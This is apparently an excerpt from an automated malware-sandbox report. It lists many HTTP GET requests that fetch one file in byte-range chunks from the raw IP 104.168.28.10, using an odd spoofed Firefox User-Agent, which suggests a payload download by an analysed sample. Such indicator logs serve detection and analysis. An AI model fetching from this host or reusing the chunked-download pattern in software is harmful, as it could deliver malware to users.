Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2826240-2842623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2842624-2875391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2875392-2891775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2891776-2924543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2924544-2940927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2940928-3006463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2940928-3006463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3006464-3022847User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3022848-3055615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3055616-3088383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3088384-3096575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3096576-3112959User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3112960-3121151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3121152-3137535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3137536-3153919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3153920-3170303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3170304-3174399User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3174400-3207167User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3207168-3215359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3170304-3174399User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3215360-3231743User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3231744-3239935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3239936-3248127User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3248128-3280895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3280896-3289087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3289088-3305471User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3305472-3321855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3321856-3338239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3338240-3354623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3354624-3371007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3371008-3403775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3403776-3411967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3411968-3420159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3420160-3452927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3371008-3403775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3452928-3469311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3469312-3477503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3477504-3510271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3510272-3514367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3547136-3563519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3579904-3596287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3596288-3604479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3514368-3547135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3563520-3579903User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3604480-3637247User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3637248-3641343User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3641344-3657727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3657728-3665919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3674112-3690495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3690496-3706879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3665920-3674111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3706880-3708927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3708928-3741695User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3758080-3790847User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3741696-3758079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3799040-3803135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3790848-3799039User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3807232-3815423User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3803136-3807231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3815424-3823615User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3823616-3839999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3840000-3856383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3856384-3860479User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3860480-3868671User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3872768-3905535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3905536-3913727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3913728-3930111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3930112-3946495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3868672-3872767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3946496-3962879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3962880-3995647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3995648-4003839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4003840-4005887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4005888-4022271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4022272-4024319User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4024320-4089855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4089856-4093951User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4093952-4110335User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4110336-4114431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4114432-4122623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4130816-4163583User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4163584-4171775User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4171776-4188159User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4122624-4130815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4188160-4204543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4204544-4212735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4212736-4245503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4245504-4249599User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4249600-4257791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4257792-4261887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4261888-4270079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4270080-4286463User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4286464-4351999User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4352000-4353023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4353024-4361215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4361216-4369407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4369408-4371455User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4387840-4396031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4396032-4400127User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4371456-4387839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4400128-4416511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4416512-4424703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4424704-4441087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4441088-4445183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4445184-4461567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4461568-4469759User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4469760-4473855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4473856-4482047User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4482048-4490239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4490240-4506623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4506624-4514815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4514816-4523007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
